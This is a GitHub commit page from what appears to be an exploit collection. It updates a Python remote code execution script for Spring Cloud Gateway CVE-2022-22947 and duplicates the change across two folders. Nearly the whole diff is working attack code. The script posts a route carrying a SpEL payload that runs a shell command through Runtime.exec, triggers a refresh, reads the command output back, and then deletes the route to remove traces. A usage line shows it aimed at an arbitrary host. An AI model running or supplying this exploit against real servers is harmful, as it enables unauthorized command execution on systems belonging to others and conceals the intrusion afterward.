Skip to content

Commit

Permalink
优化poc 执行过程
Browse files Browse the repository at this point in the history
  • Loading branch information
helloexp committed Mar 4, 2022
1 parent b7f525b commit 38f71a7
Show file tree
Hide file tree
Showing 6 changed files with 122 additions and 40 deletions.
3 changes: 3 additions & 0 deletions 00-CVE_EXP/CVE-2022-22947/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -81,3 +81,6 @@ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
Connection: close
```
![image1](images/4.png)

## poc 输出结果
![poc 输出](images/poc.png)
78 changes: 58 additions & 20 deletions 00-CVE_EXP/CVE-2022-22947/exp/exp01.py
Original file line number Diff line number Diff line change
@@ -1,10 +1,12 @@
import time

import requests
import json
import sys
import os


def exec(url):

def exploit(target_url):
headers1 = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
Expand All @@ -18,37 +20,73 @@ def exec(url):
'Content-Type': 'application/x-www-form-urlencoded'
}

## command to execute replace "id" in payload
# command to execute replace "id" in payload

payload = '''{\r
"id": "hacktest",\r
"filters": [{\r
"name": "AddResponseHeader",\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"id\\"}).getInputStream()))}"}\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"whoami\\"}).getInputStream()))}"}\r
}],\r
"uri": "http://127.0.0.1",\r
"order": 0\r
}'''


if target_url.endswith('/'):
target_url = target_url.rstrip('/')

if not target_url.startswith('http'):
print("-->请在地址前补充 http://、或https://")
exit(0)

if 'actuator' in target_url:
target_url = target_url.split('actuator')[0].rstrip('/')
print(target_url)

re1 = requests.post(url=target_url + "/actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json)
time.sleep(0.1)
re2 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
time.sleep(0.1)
re3 = requests.get(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)


re1 = requests.post(url=url + "/actuator/gateway/routes/hacktest",data=payload,headers=headers1,json=json)
re2 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
re3 = requests.get(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re4 = requests.delete(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re5 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
print(re1.text)
print(re3.text)
print("+++++++++++++++执行过程记录++++++++++++++++++")
if re1.status_code == 201:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 成功 √")
else:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 失败 ×")
exit(0)

if re2.status_code == 200:
print("Step2: 触发 payload 成功 √")
else:
print("Step2: 触发 payload 失败 ×")
exit(0)

if re3.status_code == 200:
if 'AddResponseHeader' in re3.text:
print("Step3: 执行 payload 成功 √")
print("输出如下:")
print(re3.text)

re4 = requests.delete(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)
re5 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
if re4.status_code and re5.status_code == 200:
print("Step4: 清理路由成功 成功 √")
else:
print("Step3: payload 执行 失败 ×")
exit(0)


if __name__ == "__main__":
print(''' CVE-2022-22947 exploit
print(''' CVE-2022-22947 exploit
usage: python3 test.py url
usage: python3 test.py http://8.8.8.8:9000/
''')
if(len(sys.argv)>1):
url = sys.argv[1]
exec(url)
else:
exit()
if len(sys.argv) > 1:
url = sys.argv[1]
exploit(url)
print("\n 漏洞利用 成功 √ \n")
else:
exit()
print("\n 漏洞利用 失败 × \n")

Binary file added 00-CVE_EXP/CVE-2022-22947/images/poc.png
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
3 changes: 3 additions & 0 deletions 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -81,3 +81,6 @@ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,
Connection: close
```
![image1](images/4.png)

## poc 输出结果
![poc 输出](images/poc.png)
78 changes: 58 additions & 20 deletions 21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/exp/exp01.py
Original file line number Diff line number Diff line change
@@ -1,10 +1,12 @@
import time

import requests
import json
import sys
import os


def exec(url):

def exploit(target_url):
headers1 = {
'Accept-Encoding': 'gzip, deflate',
'Accept': '*/*',
Expand All @@ -18,37 +20,73 @@ def exec(url):
'Content-Type': 'application/x-www-form-urlencoded'
}

## command to execute replace "id" in payload
# command to execute replace "id" in payload

payload = '''{\r
"id": "hacktest",\r
"filters": [{\r
"name": "AddResponseHeader",\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"id\\"}).getInputStream()))}"}\r
"args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\"whoami\\"}).getInputStream()))}"}\r
}],\r
"uri": "http://127.0.0.1",\r
"order": 0\r
}'''


if target_url.endswith('/'):
target_url = target_url.rstrip('/')

if not target_url.startswith('http'):
print("-->请在地址前补充 http://、或https://")
exit(0)

if 'actuator' in target_url:
target_url = target_url.split('actuator')[0].rstrip('/')
print(target_url)

re1 = requests.post(url=target_url + "/actuator/gateway/routes/hacktest", data=payload, headers=headers1, json=json)
time.sleep(0.1)
re2 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
time.sleep(0.1)
re3 = requests.get(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)


re1 = requests.post(url=url + "/actuator/gateway/routes/hacktest",data=payload,headers=headers1,json=json)
re2 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
re3 = requests.get(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re4 = requests.delete(url=url + "/actuator/gateway/routes/hacktest",headers=headers2)
re5 = requests.post(url=url + "/actuator/gateway/refresh" ,headers=headers2)
print(re1.text)
print(re3.text)
print("+++++++++++++++执行过程记录++++++++++++++++++")
if re1.status_code == 201:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 成功 √")
else:
print("Step1: 发送包含SpEL 表达式的路由,包含payload 失败 ×")
exit(0)

if re2.status_code == 200:
print("Step2: 触发 payload 成功 √")
else:
print("Step2: 触发 payload 失败 ×")
exit(0)

if re3.status_code == 200:
if 'AddResponseHeader' in re3.text:
print("Step3: 执行 payload 成功 √")
print("输出如下:")
print(re3.text)

re4 = requests.delete(url=target_url + "/actuator/gateway/routes/hacktest", headers=headers2)
re5 = requests.post(url=target_url + "/actuator/gateway/refresh", headers=headers2)
if re4.status_code and re5.status_code == 200:
print("Step4: 清理路由成功 成功 √")
else:
print("Step3: payload 执行 失败 ×")
exit(0)


if __name__ == "__main__":
print(''' CVE-2022-22947 exploit
print(''' CVE-2022-22947 exploit
usage: python3 test.py url
usage: python3 test.py http://8.8.8.8:9000/
''')
if(len(sys.argv)>1):
url = sys.argv[1]
exec(url)
else:
exit()
if len(sys.argv) > 1:
url = sys.argv[1]
exploit(url)
print("\n 漏洞利用 成功 √ \n")
else:
exit()
print("\n 漏洞利用 失败 × \n")

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.

0 comments on commit 38f71a7

Please sign in to comment.